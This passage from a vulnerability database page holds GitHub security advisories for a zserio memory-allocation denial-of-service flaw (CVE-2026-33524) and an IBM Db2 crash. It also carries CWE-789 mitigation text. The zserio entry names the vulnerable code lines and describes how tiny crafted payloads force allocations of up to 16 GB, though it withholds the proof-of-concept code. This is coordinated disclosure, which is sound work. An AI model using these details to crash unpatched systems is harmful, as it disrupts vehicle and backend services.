"summary": "MessagePack for Java Vulnerable to Remote DoS via Malicious EXT Payload Allocation"
}
GHSA-CWQ5-8PVQ-J65J
Vulnerability from github – Published: 2026-04-24 16:25 – Updated: 2026-05-04 20:08Summary
Unbounded Memory Allocation (all platforms)
A crafted payload as small as 4-5 bytes can force memory allocations of up to 16 GB, crashing any process with an OOM error (Denial of Service).
Affected code (C++):
- cpp/runtime/src/zserio/Array.h (line 1029) — m_rawArray.reserve(readLength) with unchecked readLength
- cpp/runtime/src/zserio/BitStreamReader.h (lines 249, 281) — value.reserve(len) with unchecked len
Affected code (Java):
- java/runtime/src/zserio/runtime/array/Array.java (line 271) — rawArray.reset(readSize) → new int[readSize]
- java/runtime/src/zserio/runtime/io/ByteArrayBitStreamReader.java (line 245) — new byte[length]
Proof of Concept
Memory Allocation DoS (verified on 64-bit)
| Payload | Claimed Size | Allocated | Amplification |
|---|---|---|---|
| 4 bytes | 100,000,000 | 762 MB | ~200 million x |
| 5 bytes | 2,147,483,647 | ~16 GB | system crash |
The full PoC source code and Docker build files are available upon request.
Impact
zserio is the serialization framework underlying the NDS (Navigation Data Standard), used by 43 member companies including Toyota, BMW, Volkswagen, Mercedes-Benz, and others. According to the Eclipse zserio project:
"Zserio serialized data is used in millions of deployments in cars on the road"
Attack vectors include NDS.Live cloud map updates, map data supply chain compromise, and backend data processing pipelines. On 32-bit automotive ECUs, this could affect ADAS functionality.
Suggested Fix
For all runtimes: Validate varsize against stream size
if (claimedSize > remainingBytesInStream) {
throw error("varsize claims more data than available in stream");
}
Disclosure Timeline
- 2026-03-08: Reported to Woven by Toyota PSIRT (go-zserio)
- 2026-03-10: Reported to ndsev/zserio maintainers via GitHub Security Advisory
- 2026-03-23: Split off overflow vulnerability to own report
- 90-day coordinated disclosure timeline
A patch for this issue is available at https://github.com/ndsev/zserio/releases/tag/v2.18.1.
Reporter
Ryuji Yasukochi (ryuji.yasu@gmail.com)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.18.0"
},
"package": {
"ecosystem": "Maven",
"name": "io.github.ndsev:zserio-runtime"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.18.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33524"
],
"database_specific": {
"cwe_ids": [
"CWE-789"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-24T16:25:11Z",
"nvd_published_at": "2026-04-24T19:17:09Z",
"severity": "HIGH"
},
"details": "## Summary\n\n### Unbounded Memory Allocation (all platforms)\n\nA crafted payload as small as 4-5 bytes can force memory allocations of up to 16 GB, crashing any process with an OOM error (Denial of Service).\n\n**Affected code (C++):**\n- `cpp/runtime/src/zserio/Array.h` (line 1029) \u2014 `m_rawArray.reserve(readLength)` with unchecked `readLength`\n- `cpp/runtime/src/zserio/BitStreamReader.h` (lines 249, 281) \u2014 `value.reserve(len)` with unchecked `len`\n\n**Affected code (Java):**\n- `java/runtime/src/zserio/runtime/array/Array.java` (line 271) \u2014 `rawArray.reset(readSize)` \u2192 `new int[readSize]`\n- `java/runtime/src/zserio/runtime/io/ByteArrayBitStreamReader.java` (line 245) \u2014 `new byte[length]`\n\n## Proof of Concept\n\n### Memory Allocation DoS (verified on 64-bit)\n\n| Payload | Claimed Size | Allocated | Amplification |\n|---------|-------------|-----------|---------------|\n| 4 bytes | 100,000,000 | 762 MB | ~200 million x |\n| 5 bytes | 2,147,483,647 | ~16 GB | system crash |\n\nThe full PoC source code and Docker build files are available upon request.\n\n## Impact\n\nzserio is the serialization framework underlying the **NDS (Navigation Data Standard)**, used by 43 member companies including Toyota, BMW, Volkswagen, Mercedes-Benz, and others. According to the Eclipse zserio project:\n\n\u003e \"Zserio serialized data is used in millions of deployments in cars on the road\"\n\nAttack vectors include NDS.Live cloud map updates, map data supply chain compromise, and backend data processing pipelines. On 32-bit automotive ECUs, this could affect ADAS functionality.\n\n## Suggested Fix\n\n### For all runtimes: Validate varsize against stream size\n\n```\nif (claimedSize \u003e remainingBytesInStream) {\n throw error(\"varsize claims more data than available in stream\");\n}\n```\n\n## Disclosure Timeline\n\n- **2026-03-08:** Reported to Woven by Toyota PSIRT (go-zserio)\n- **2026-03-10:** Reported to ndsev/zserio maintainers via GitHub Security Advisory\n- **2026-03-23:** Split off overflow vulnerability to own report\n- **90-day coordinated disclosure timeline**\n\nA patch for this issue is available at https://github.com/ndsev/zserio/releases/tag/v2.18.1.\n\n## Reporter\n\nRyuji Yasukochi (ryuji.yasu@gmail.com)",
"id": "GHSA-cwq5-8pvq-j65j",
"modified": "2026-05-04T20:08:28Z",
"published": "2026-04-24T16:25:11Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ndsev/zserio/security/advisories/GHSA-cwq5-8pvq-j65j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33524"
},
{
"type": "WEB",
"url": "https://github.com/ndsev/zserio/commit/a9932de4b5eefb3afd5e18ca2fd758aa744a7c69"
},
{
"type": "PACKAGE",
"url": "https://github.com/ndsev/zserio"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Zserio Runtime: Integer Overflow in BitStreamReader and Unbounded Memory Allocation in Deserialization"
}
GHSA-CX5F-75FV-W3C7
Vulnerability from github – Published: 2024-12-07 15:34 – Updated: 2024-12-07 15:34IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash under certain conditions with a specially crafted query.
{
"affected": [],
"aliases": [
"CVE-2024-41762"
],
"database_specific": {
"cwe_ids": [
"CWE-770",
"CWE-789"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-07T14:15:17Z",
"severity": "MODERATE"
},
"details": "IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash under certain conditions with a specially crafted query.",
"id": "GHSA-cx5f-75fv-w3c7",
"modified": "2024-12-07T15:34:10Z",
"published": "2024-12-07T15:34:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41762"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7175946"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Perform adequate input validation against any value that influences the amount of memory that is allocated. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary.
Mitigation
Run your program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized.
No CAPEC attack patterns related to this CWE.